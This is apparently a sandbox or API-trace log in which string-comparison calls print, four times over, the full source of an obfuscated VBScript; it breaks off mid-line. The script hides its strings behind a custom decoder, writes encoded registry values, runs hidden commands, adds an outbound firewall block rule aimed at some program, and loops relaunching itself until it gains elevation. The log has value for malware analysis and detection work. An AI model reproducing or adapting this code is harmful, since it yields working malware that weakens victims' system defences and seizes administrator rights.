bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 42 [0226.286] wcsncmp (_String1=" = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.286] wcsncmp (_String1="= 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.286] wcsncmp (_String1=" 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.286] wcsncmp (_String1="1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 